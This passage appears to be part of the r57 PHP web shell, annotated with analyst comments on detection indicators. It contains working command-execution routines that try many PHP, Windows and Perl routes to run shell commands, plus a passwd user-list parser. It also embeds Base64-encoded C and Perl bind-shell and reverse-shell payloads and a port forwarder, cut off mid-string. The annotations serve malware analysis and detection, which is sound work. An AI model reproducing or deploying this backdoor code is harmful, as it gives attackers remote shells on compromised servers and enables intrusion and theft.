 $r .= "</b></font></ TD>";
 $r .= "</TR>";
 foreach($v as $a=>$b)
 {
 $r .= "<TR>";
 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
 // $b went through strip_tags() in SearchText() but is not HTML-escaped here.
 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
 $r .= "</TR>\n";
 }
 }
 $r .= "</TABLE>";
 echo $r;
 }
 else
 {
 // "Nothing found" text comes from $lang, defined outside this part of the file.
 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
 }
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
 die();
 }
3079
3080
3081
/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/
// Command-execution probe: runs `echo abcr57` through ex() and checks that
// "r57" appears at offset 3 of the output. $safe_mode becomes 1 when it does
// not, i.e. when no command output came back.
// Analyst note: this runs on every request that reaches this point, so a
// shell process whose command line is `echo abcr57`, spawned by the web
// server or PHP worker, is a usable process-creation indicator for this file.
if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;}
// Server banner from the environment, "-" when it is not set.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
3089
3090
3091
/**
 * Build a run of $i padding characters for HTML layout.
 *
 * @param int $i number of repetitions
 * @return string the repeated character (errors from str_repeat are suppressed)
 */
function ws($i)
{
    $padding = @str_repeat(" ", $i);

    return $padding;
}
3099
3100
3101
/**
 * Run an operating-system command and return its output, HTML-escaped.
 *
 * Tries the PHP process-execution functions in a fixed order and uses the
 * first one that function_exists() reports: exec, shell_exec, system,
 * passthru, popen, proc_open. If none is reported, the result is the empty
 * string. safe_ex() is reached only through the outer else, i.e. when $cfe
 * is empty.
 *
 * Analyst note: every branch ends in a child process of the web server / PHP
 * worker, so process-creation telemetry (parent = httpd, php-fpm, w3wp and
 * similar; child = sh, cmd.exe) is the main detection point. function_exists()
 * returns false for names listed in `disable_functions`, so a php.ini that
 * disables all six makes each branch fall through; the file's header also
 * calls ini_restore() on that setting, so keep the restriction in php.ini
 * rather than relying on per-directory overrides.
 *
 * @param string $cfe command line, passed to the shell unmodified
 * @return string command output after htmlspecialchars()
 */
function ex($cfe)
{global $unix,$tempdir;
 $res = '';
 if (!empty($cfe))
 {
 if(@function_exists('exec'))
 {
 // exec() fills $res with an array of output lines; joined back with newlines.
 @exec($cfe,$res);
 $res = join("\n",$res);
 }
 elseif(@function_exists('shell_exec'))
 {
 $res = @shell_exec($cfe);
 }
 elseif(@function_exists('system'))
 {
 // Output is captured through an output buffer. Note the argument here is
 // the single-quoted literal '$cfe', not the variable.
 @ob_start();
 @system('$cfe');
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(@function_exists('passthru'))
 {
 @ob_start();
 @passthru($cfe);
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r")))
 {
 // Read the pipe in 1024-byte chunks with fread(), or fgets() as a fallback.
 $res = "";
 if(@function_exists('fread') && @function_exists('feof')){
 while(!@feof($f)) { $res .= @fread($f,1024); }
 }else if(@function_exists('fgets') && @function_exists('feof')){
 while(!@feof($f)) { $res .= @fgets($f,1024); }
 }
 @pclose($f);
 }
 elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
 {
 // Only stdout (descriptor 1) is piped back; stderr is not captured.
 $res = "";
 if(@function_exists('fread') && @function_exists('feof')){
 while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
 }else if(@function_exists('fgets') && @function_exists('feof')){
 while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
 }
 @proc_close($f);
 }
 }else{$res = safe_ex($cfe);}
 return htmlspecialchars($res);
}
3203
3204
3205
3206
3207
/**
 * Alternative command runner that avoids the standard PHP exec functions and
 * goes through loaded extensions instead: perl, ffi (WinExec), win32service,
 * win32std, COM (WScript.Shell), then pcntl_fork/pcntl_exec.
 *
 * All Windows branches redirect output to a temporary file named
 * $tempdir . uniqid('NJ'), read it back with moreread() (defined outside this
 * part of the file) and delete it. The pcntl branch uses uniqid('pcntl').
 *
 * Analyst note: on-disk and host indicators visible in this code are
 * short-lived files with an "NJ" or "pcntl" prefix in the script's temp
 * directory, a service created, started, stopped and deleted within one
 * request with an "NJ"-prefixed name and cmd.exe as its binary path
 * (service-install events such as System log ID 7045), and cmd.exe or perl
 * started by the web server process. Unloading the perl, ffi, win32service,
 * win32std, com_dotnet and pcntl extensions on web-facing PHP removes each
 * branch's prerequisite.
 *
 * @param string $cfe command line
 * @return string output after htmlspecialchars(); empty when $cfe is empty
 */
function safe_ex($cfe)
{global $unix,$tempdir;
 $res = '';
 if (!empty($cfe))
 {
 if(extension_loaded('perl')){
 // Embedded Perl interpreter; output is captured via an output buffer.
 @ob_start();
 $safeperl=new perl();
 $safeperl->eval("system('$cfe')");
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(!$unix && extension_loaded('ffi'))
 {
 // FFI binding to kernel32!WinExec; escapeshellarg() is applied when available.
 $output=$tempdir.uniqid('NJ');
 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
 if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);}
 else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);}
 // Polls once per second, with no upper bound, until the output file exists.
 while(!@file_exists($output))sleep(1);
 $res=moreread($output);
 @unlink($output);
 }
 elseif(!$unix && extension_loaded('win32service'))
 {
 // Temporary Windows service whose binary is cmd.exe; removed right after start.
 $output=$tempdir.uniqid('NJ');
 $n_ser=uniqid('NJ');
 if(!@function_exists('escapeshellarg'))
 {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));}
 else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));}
 @win32_start_service($n_ser);
 @win32_stop_service($n_ser);
 @win32_delete_service($n_ser);
 while(!@file_exists($output))sleep(1);
 $res=moreread($output);
 @unlink($output);
 }
 elseif(!$unix && extension_loaded("win32std"))
 {
 // win32std shell-execute with a relative path up to \windows\system32\cmd.exe.
 $output=$tempdir.uniqid('NJ');
 if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
 else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
 while(!@file_exists($output))sleep(1);
 $res=moreread($output);
 @unlink($output);
 }
 elseif(!$unix)
 {
 // COM automation of WScript.Shell; this branch does not wait for the output file.
 $output=$tempdir.uniqid('NJ');
 $suntzu = new COM("WScript.Shell");
 if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
 else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
 $res=moreread($output);
 @unlink($output);
 }
 elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork'))
 {
 // Fork, then replace the child with perl at one of two fixed paths.
 // The status text collected in $res is overwritten by the moreread() result below.
 $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
 $output=$tempdir.uniqid('pcntl');
 $pid = @pcntl_fork();
 if ($pid == -1) {
 $res .= '[-] Could not children fork. Exit';
 } else if ($pid) {
 // $status is never assigned in this function before being tested.
 if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
 else {$res .= '[-] Error. Command incorrect.';}
 } else {
 $cfe = array(" -e 'system(\"$cfe > $output\")'");
 if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
 if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
 die();
 }
 $res=moreread($output);
 @unlink($output);
 }
/* elseif(1)
 {

 }
*/
 }
 return htmlspecialchars($res);
}
3369
3370
3371
/**
 * Extract the first colon-separated field from every line of a passwd-style
 * file.
 *
 * The file is read with moreread(), and with readzlib() when the first line
 * comes back empty; both helpers are defined outside this part of the file.
 * Lines starting with '#' are skipped. Empty lines are not filtered, so they
 * contribute an empty-string entry.
 *
 * @param string $filename path of the file to parse
 * @return array|int list of first fields, or 0 when nothing could be read
 */
function get_users($filename)
{
 $users = $rows = array();
 $rows=@explode("\n",moreread($filename));
 // Second attempt through the zlib-based reader when the first read gave nothing.
 if(!$rows[0]){$rows=@explode("\n",readzlib($filename));}
 if(!$rows[0]) return 0;
 foreach ($rows as $string)
 {
 $user = @explode(":",trim($string));
 // The comment test looks at the untrimmed line, so an indented '#' is not skipped.
 if(substr($string,0,1)!='#') array_push($users,$user[0]);
 }
 return $users;
}
3397
/**
 * Print a red, centred error box.
 *
 * The message is looked up in $GLOBALS['lang'] under the key
 * "<language>_err<n>"; $txt, when non-empty, is appended after a space.
 * Neither value is HTML-escaped.
 *
 * @param int|string $n   error number used to build the lookup key
 * @param string     $txt optional extra text
 * @return null
 */
function err($n,$txt='')
{
    print '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';

    $messageKey = $GLOBALS['language'].'_err'.$n;
    print $GLOBALS['lang'][$messageKey];

    if (!empty($txt)) {
        print " $txt";
    }

    print '</b></div></font></td></tr></table>';

    return null;
}
3413
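/**
 * Format a Unix file mode as an `ls -l` style string such as "-rwxr-xr-x".
 *
 * The file-type character is chosen by comparing the masked type field
 * ($mode & 0xF000) with each type value. Testing single bits in sequence,
 * as the earlier version did, reports block devices (0x6000), symlinks
 * (0xA000) and sockets (0xC000) as 'c' or 'd', because they share bits with
 * the character-device and directory values tested first.
 *
 * @param int $mode mode bits as returned by fileperms() or stat()
 * @return string|int ten-character string, or 0 when $GLOBALS['unix'] is false
 */
function perms($mode)
{
    if (!$GLOBALS['unix']) return 0;

    // File type: compare the whole type field, not individual bits.
    switch ($mode & 0xF000) {
        case 0x1000: $type = 'p'; break; // FIFO
        case 0x2000: $type = 'c'; break; // character device
        case 0x4000: $type = 'd'; break; // directory
        case 0x6000: $type = 'b'; break; // block device
        case 0x8000: $type = '-'; break; // regular file
        case 0xA000: $type = 'l'; break; // symbolic link
        case 0xC000: $type = 's'; break; // socket
        default:     $type = 'u';        // unknown
    }

    $owner = array(
        'read'    => ($mode & 00400) ? 'r' : '-',
        'write'   => ($mode & 00200) ? 'w' : '-',
        'execute' => ($mode & 00100) ? 'x' : '-',
    );
    $group = array(
        'read'    => ($mode & 00040) ? 'r' : '-',
        'write'   => ($mode & 00020) ? 'w' : '-',
        'execute' => ($mode & 00010) ? 'x' : '-',
    );
    $world = array(
        'read'    => ($mode & 00004) ? 'r' : '-',
        'write'   => ($mode & 00002) ? 'w' : '-',
        'execute' => ($mode & 00001) ? 'x' : '-',
    );

    // setuid / setgid / sticky replace the execute column; lower case when
    // the execute bit is also set, upper case when it is not.
    if ($mode & 0x800) $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x400) $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x200) $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';

    $s  = sprintf("%1s", $type);
    $s .= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
    $s .= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
    $s .= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);

    return trim($s);
}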
3471
/**
 * Build an HTML <input> tag as a string.
 *
 * Attribute values are concatenated as given; only `value` is wrapped in
 * double quotes and nothing is HTML-escaped.
 *
 * @param string     $type    input type
 * @param string     $name    input name
 * @param int|string $size    size attribute; omitted when it compares equal to 0
 * @param string     $value   value attribute
 * @param mixed      $checked truthy to append " checked"
 * @return string the tag
 */
function in($type,$name,$size,$value,$checked=0)
{
    $sizeAttr    = ($size != 0) ? "size=".$size." " : "";
    $checkedAttr = $checked ? " checked" : "";

    return "<input type=".$type." name=".$name." ".$sizeAttr."value=\"".$value."\"".$checkedAttr.">";
}
3487
/**
 * Look up a program with the shell's `which` through ex().
 *
 * $pr is placed into the command line unquoted.
 *
 * @param string $pr program name
 * @return string|false HTML-escaped output of `which`, or false when it is empty
 */
function which($pr)
{
$path = '';
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return false; }
}
3499
/**
 * Check the process list for a name through ex().
 *
 * Uses `ps -aux | grep` when the $unix flag is set and `tasklist | findstr`
 * otherwise. $pr is placed into the command line as given.
 *
 * @param string $pr process name to look for
 * @return string|false HTML-escaped matching lines, or false when there are none
 */
function ps($pr)
{global $unix;
$path = '';
if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");}
else{$path = ex("tasklist | findstr \"$pr\"");}
if(!empty($path)) { return $path; } else { return false; }
}
3513
/**
 * Search the file-name database with `locate` through ex().
 *
 * $pr is placed into the command line unquoted.
 *
 * @param string $pr name or pattern
 * @return string|false HTML-escaped output of `locate`, or false when it is empty
 */
function locate($pr)
{
$path = '';
$path = ex("locate $pr");
if(!empty($path)) { return $path; } else { return false; }
}
3525
/**
 * Decode a Base64 string and write the result to a file.
 *
 * Writing goes through morewrite(), defined outside this part of the file;
 * when it reports failure, err(0) prints the error box.
 * Analyst note: the script carries several Base64 string literals further
 * down; files appearing in temp or web-writable directories right after a
 * request to this script are worth collecting and hashing during response.
 *
 * @param string $fname destination path
 * @param string $text  Base64-encoded content
 */
function cf($fname,$text)
{
 if(!morewrite($fname,@base64_decode($text))){err(0);};
}
3533
/**
 * Build a two-cell table row: a right-aligned cell of width $l percent
 * followed by a left-aligned cell. Cell contents are inserted unescaped.
 *
 * @param int|string $l  width of the first cell, in percent
 * @param string     $t1 content of the first cell
 * @param string     $t2 content of the second cell
 * @return string the <tr> markup
 */
function sr($l,$t1,$t2)
{
    $labelCell = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $valueCell = "<td class=td1 align=left>".$t2."</td>";

    return "<tr class=tr1>".$labelCell.$valueCell."</tr>";
}
3541
// Defined only when no view_size() exists yet.
if (!@function_exists("view_size"))
{
    /**
     * Format a byte count with a binary unit (GB, MB, KB) rounded to two
     * decimals, or as plain bytes with a " B" suffix below 1024.
     *
     * @param int|float $size size in bytes
     * @return string formatted size
     */
    function view_size($size)
    {
        // Largest unit first; the first threshold reached decides the unit.
        $units = array(
            " GB" => 1073741824,
            " MB" => 1048576,
            " KB" => 1024,
        );

        foreach ($units as $suffix => $threshold) {
            if ($size >= $threshold) {
                return @round($size / $threshold * 100) / 100 . $suffix;
            }
        }

        return $size . " B";
    }
}
3563
/**
 * Recursively list the files below a directory.
 *
 * @param string $dir   directory to walk
 * @param string $types optional ';'-separated list of extensions including
 *                      the dot (".php;.txt"); empty means every file
 * @return array paths built as "$dir/<name>", in readdir() order; empty when
 *               the directory cannot be opened
 */
function DirFilesR($dir,$types='')
{
    $found = Array();

    $handle = @opendir($dir);
    if (!$handle) {
        return $found;
    }

    while (false !== ($entry = @readdir($handle))) {
        if ($entry == "." || $entry == "..") {
            continue;
        }

        $full = $dir."/".$entry;

        if (@is_dir($full)) {
            $found = @array_merge($found, DirFilesR($full, $types));
            continue;
        }

        // Extension = everything from the last dot to the end of the name.
        $dot = @strrpos($entry, ".");
        $ext = @substr($entry, $dot, @strlen($entry) - $dot);

        if (!$types || @in_array($ext, explode(';', $types))) {
            $found[] = $full;
        }
    }

    @closedir($handle);

    return $found;
}
3621
/**
 * Text search over the files below one or more directories.
 *
 * The constructor collects the file list with DirFilesR(); SearchText() then
 * reads each file line by line and records the lines matching any of the
 * space-separated words in the search text.
 *
 * Written in PHP 4 style: properties are declared with `var` and the
 * constructor is a method named after the class, which PHP 8 no longer
 * treats as a constructor.
 */
class SearchResult
 {
 var $text;            // search text as given
 var $FilesToSearch;   // list of file paths to scan
 var $ResultFiles;     // path => (1-based line number => line with highlight markup)
 var $FilesTotal;      // number of files in $FilesToSearch
 var $MatchesCount;    // total number of matches
 var $FileMatschesCount; // spelled differently from the FileMatchesCount property the methods use
 var $TimeStart;       // getmicrotime() value taken in the constructor
 var $TimeTotal;       // elapsed seconds, set at the end of SearchText()
 var $titles;          // initialised to an empty array and not filled in this class
 // $dir: ';'-separated directories; $text: search words; $filter: ';'-separated
 // extensions passed on to DirFilesR().
 function SearchResult($dir,$text,$filter='')
 {
 $dirs = @explode(";",$dir);
 $this->FilesToSearch = Array();
 for($a=0;$a<count($dirs);$a++)
 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
 $this->text = $text;
 $this->FilesTotal = @count($this->FilesToSearch);
 $this->TimeStart = getmicrotime();
 $this->MatchesCount = 0;
 $this->ResultFiles = Array();
 $this->FileMatchesCount = Array();
 $this->titles = Array();
 }
 function GetFilesTotal() { return $this->FilesTotal; }
 function GetTitles() { return $this->titles; }
 function GetTimeTotal() { return $this->TimeTotal; }
 function GetMatchesCount() { return $this->MatchesCount; }
 function GetFileMatchesCount() { return $this->FileMatchesCount; }
 function GetResultFiles() { return $this->ResultFiles; }
 // $phrase: truthy wraps every word in \b...\b; $case: falsy adds the 'i' modifier.
 function SearchText($phrase=0,$case=0) {
 $qq = @explode(' ',$this->text);
 $delim = '|';
 if($phrase)
 foreach($qq as $k=>$v)
 $qq[$k] = '\b'.$v.'\b';
 // The words go into the pattern as-is (no preg_quote), so regex
 // metacharacters or a '/' in the search text change or break the pattern.
 $words = '('.@implode($delim,$qq).')';
 $pattern = "/".$words."/";
 if(!$case)
 $pattern .= 'i';
 foreach($this->FilesToSearch as $k=>$filename)
 {
 $this->FileMatchesCount[$filename] = 0;
 // Each file is loaded whole into memory; unreadable files yield false.
 $FileStrings = @file($filename) or @next;
 for($a=0;$a<@count($FileStrings);$a++)
 {
 $count = 0;
 $CurString = $FileStrings[$a];
 $CurString = @Trim($CurString);
 // Tags are stripped before matching; the line is not HTML-escaped.
 $CurString = @strip_tags($CurString);
 $aa = '';
 if(($count = @preg_match_all($pattern,$CurString,$aa)))
 {
 // Matches are wrapped in highlight markup; lines are stored under 1-based numbers.
 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
 $this->ResultFiles[$filename][$a+1] = $CurString;
 $this->MatchesCount += $count;
 $this->FileMatchesCount[$filename] += $count;
 }
 }
 }
 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
 }
 }
3749
/**
 * Current Unix time in seconds as a float with microsecond resolution.
 *
 * microtime() without arguments returns "<fraction> <seconds>"; both parts
 * are cast to float and added.
 *
 * @return float
 */
function getmicrotime()
{
    $parts = @explode(" ", @microtime());
    $fraction = (float)$parts[0];
    $seconds  = (float)$parts[1];

    return ($fraction + $seconds);
}
3759
3760$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
3761
3762A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
3763
3764GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
3765
3766b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
3767
3768pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
3769
3770NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
3771
3772ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
3773
3774ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
3775
37767DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
3777
37789tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
3779
37802ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
3781
3782dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
3783
3784lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
3785
3786$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
3787
3788VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
3789
3790JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
3791
3792TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
3793
3794lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
3795
3796Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
3797
3798Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
3799
3800lIENPTk47DQpleGl0IDA7DQp9DQp9";
3801
3802$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
3803
3804aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
3805
3806hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
3807
3808sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
3809
3810kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
3811
3812KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
3813
3814OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
3815
3816$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
3817
3818BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
3819
3820SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
3821
3822KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
3823
3824sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
3825
3826Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
3827
3828QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
3829
3830Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
3831
3832$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
3833
3834x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
3835
3836HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
3837
3838aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
3839
3840lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
3841
3842xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
3843
3844W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
3845
3846LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
3847
3848udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
3849
38500KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
3851
3852iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
3853
